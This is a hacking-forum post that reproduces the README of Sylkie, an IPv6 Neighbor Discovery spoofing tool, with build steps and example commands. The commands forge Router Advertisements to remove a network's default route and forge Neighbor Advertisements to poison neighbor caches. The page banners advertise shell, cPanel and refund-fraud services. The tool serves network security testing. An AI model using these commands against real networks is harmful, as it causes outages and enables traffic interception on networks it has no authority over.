Login Register






SMTPMart - Buy Inbox SMTP | Leads | Shell | cPanel 100% Bonus on 1st deposit | Instant Refunds
ProxyByte $2/GB | Residential IPv4 - No Logs - 26M+ IPs - All unblocked
REFUNDING.GG | #1 REFUND SERVICE | SAME DAY REFUNDS | WORLDWIDE ORDERS | GET ITEMS 85% OFF
The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.
Thread Rating:
  • 0 Vote(s) - 0 Average


Sylkie - IPv6 address spoofing filter_list
Author
Message
ZanGetsu Offline
Hi Im ZanGetsu
 *****
Registered (Gold)
Seven Years of Service
Posts: 362
Threads: 255
Reputation: 29

Points: 125NSP
Gold
Sylkie - IPv6 address spoofing 09-02-2017, 08:35 AM #1
[Image: 48e0c42ffae1aa80494e5b477b165219.png]

A command line tool and library for testing networks for common address spoofing security vulnerabilities in IPv6 networks using the Neighbor Discovery Protocol.

Build

Get the code and compile it!

# Get the code
Code:
git clone https://github.com/dlrobertson/sylkie
cd ./sylkie

# Compile the code
mkdir -p ./build
cd ./build
cmake -DCMAKE_BUILD_TYPE=Release ..
make
make install

Basic usage

The following describes the basic usage of sylkie. Run sylkie -h or sylkie <subcommand> -h for more details or check out Advanced Usage for more examples.

Note: sylkie uses raw sockets to send the forged advertisements. As a result, the executable must either have the setuid bit set, or it must be run as root.

DoS (Router Advert)

The basic usage of the router-advert command is listed below. This command will send a Router Advertisement message to the given ip or the all nodes multicast addres causing the targeted nodes to remove <router-ip>/<prefix> from their list of default routes.

sylkie ra -i <interface> \
   --target-mac <mac of router> \
   --router-ip <ip of router> \
   --prefix <router prefix> \
   --timeout <time between adverts> \
   --repeat <number of times to send the request>
Router Advert Examples

A basic example.

sylkie ra -i ens3 \
   --target-mac 52:54:00:e3:f4:06 \
   --router-ip fe80::b95b:ee1:cafe:9720 \
   --prefix 64 \
   --repeat -1 \
   --timeout 10
This would send a "forged" Router Advertisement to the link local scope all-nodes address ff02::1 causing all of the nodes to remove fe80::b95b:ee1:cafe:9720/64 (link-layer address 52:54:00:e3:f4:06) from their list of default routes.

Address spoofing (Neighbor Advert)

The basic usage of the sylkie neighbor advert command is listed below. This command will send a forged Neighbor Advertisement message to the given ip.

sylkie na -i <interface> \
   --dst-mac <dest hw addr> \
   --src-ip <source ip> \
   --dst-ip <dest ip address> \
   --target-ip <target ip address> \
   --target-mac <target mac address> \
   --timeout <time betweeen adverts> \
   --repeat <number of times to send the request>
Neighbor Advert examples

A basic example

sylkie na -i ens3 \
   --dst-mac 52:54:00:e3:f4:06 \
   --src-ip fe80::61ad:fda3:3032:f6f4 \
   --dst-ip fe80::b95b:ee1:cafe:9720 \
   --target-ip fe80::61ad:fda3:3032:f6f4 \
   --target-mac 52:54:00:c2:a7:7c \
   --repeat -1 \
   --timeout 3
This would send a "forged" Neighbor Advertisement message to dst-ip (fe80::b95b:ee1:cafe:9720), causing the hardware address in the neighbor cache for the target-ip (fe80::61ad:fda3:3032:f6f4) to be updated to the target-mac (52:54:00:c2:a7:7c).

Download From Website
[Image: Vs4P58c.png]

Reply







Users browsing this thread: 1 Guest(s)